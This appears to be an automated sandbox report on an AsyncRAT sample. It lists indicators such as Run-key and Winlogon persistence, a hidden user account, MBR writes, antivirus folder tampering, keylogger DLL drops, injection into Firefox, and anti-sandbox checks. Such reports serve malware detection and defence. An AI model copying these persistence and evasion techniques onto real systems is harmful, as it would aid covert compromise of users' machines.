asyncrat | a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86

Processes:

taskhostw.exehjjgaa.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe"	hjjgaa.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

OnlineInstaller.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira OnlineInstaller.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira	OnlineInstaller.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

Processes:

aliens.exejg2_2qua.exe97535F5358BB4449.exe97535F5358BB4449.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aliens.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg2_2qua.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	97535F5358BB4449.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msiexec.exemsiexec.exeapi.exe

description	ioc	process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\U:	api.exe
File opened (read-only)	\??\B:	api.exe
File opened (read-only)	\??\Z:	api.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	api.exe
File opened (read-only)	\??\S:	api.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	api.exe
File opened (read-only)	\??\Q:	api.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	api.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	api.exe
File opened (read-only)	\??\P:	api.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	api.exe
File opened (read-only)	\??\R:	api.exe
File opened (read-only)	\??\w:	api.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\L:	api.exe
File opened (read-only)	\??\F:	api.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\D:	api.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	api.exe
File opened (read-only)	\??\Y:	api.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	api.exe
File opened (read-only)	\??\O:	api.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	api.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	api.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	api.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	api.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com
60 checkip.amazonaws.com
89 ip-api.com

flow	ioc
15	ip-api.com
60	checkip.amazonaws.com
89	ip-api.com

Modifies WinLogon 2 TTPs 8 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

Processes:

update.exeRDPWInst.exeRDPWinst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

97535F5358BB4449.exeapi.exealiens.exe97535F5358BB4449.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	97535F5358BB4449.exe
File opened for modification	\??\PhysicalDrive0	api.exe
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	97535F5358BB4449.exe

Drops file in System32 directory 11 IoCs

Processes:

rutserv.exetaskhost.exeOnlineInstaller.tmp

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe
File created	C:\Windows\system32\spoolsr.exe	OnlineInstaller.tmp
File created	C:\Windows\system32\MS.dat	OnlineInstaller.tmp
File created	C:\Windows\system32\KeyHook64.dll	OnlineInstaller.tmp
File created	C:\Windows\system32\KH.dat	OnlineInstaller.tmp
File created	C:\Windows\system32\usp20.dll	OnlineInstaller.tmp
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe
File created	C:\Windows\system32\UP.dat	OnlineInstaller.tmp

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

aliens.exe

pid process

5192 aliens.exe

pid	process
5192	aliens.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

key.exe97535F5358BB4449.exe

description	pid	process	target process
PID 5728 set thread context of 5868	5728	key.exe	key.exe
PID 5304 set thread context of 3312	5304	97535F5358BB4449.exe	firefox.exe
PID 5304 set thread context of 5940	5304	97535F5358BB4449.exe	firefox.exe
PID 5304 set thread context of 5424	5304	97535F5358BB4449.exe	firefox.exe
PID 5304 set thread context of 4836	5304	97535F5358BB4449.exe	firefox.exe

Drops file in Program Files directory 35 IoCs

Processes:

update.exeRDPWInst.exeutorrent.exesetup.exeRDPWinst.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File opened for modification	C:\Program Files\RDP Wrapper	utorrent.exe
File created	C:\Program Files (x86)\dz7d9shn0mvi\__tmp_rar_sfx_access_check_259482859	setup.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File created	C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe	setup.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe	setup.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files (x86)\dz7d9shn0mvi	setup.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

97535F5358BB4449.exe97535F5358BB4449.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	97535F5358BB4449.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

winit.exeazur.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4408 schtasks.exe
1208 schtasks.exe
2896 schtasks.exe
1080 schtasks.exe
2532 schtasks.exe
4544 schtasks.exe
484 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

200 timeout.exe
4956 timeout.exe
5112 timeout.exe
5080 timeout.exe
2164 timeout.exe
4528 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

5636 ipconfig.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4228 taskkill.exe
2892 taskkill.exe
4316 taskkill.exe
5360 taskkill.exe

pid	process
4408	schtasks.exe
1208	schtasks.exe
2896	schtasks.exe
1080	schtasks.exe
2532	schtasks.exe
4544	schtasks.exe
484	schtasks.exe

pid	process
200	timeout.exe
4956	timeout.exe
5112	timeout.exe
5080	timeout.exe
2164	timeout.exe
4528	timeout.exe

pid	process
5636	ipconfig.exe

pid	process
4228	taskkill.exe
2892	taskkill.exe
4316	taskkill.exe
5360	taskkill.exe

Modifies registry class 52 IoCs

Processes:

MicrosoftEdge.exeR8.exeDownloads.exewinit.execmd.exewini.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Downloads.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	wini.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
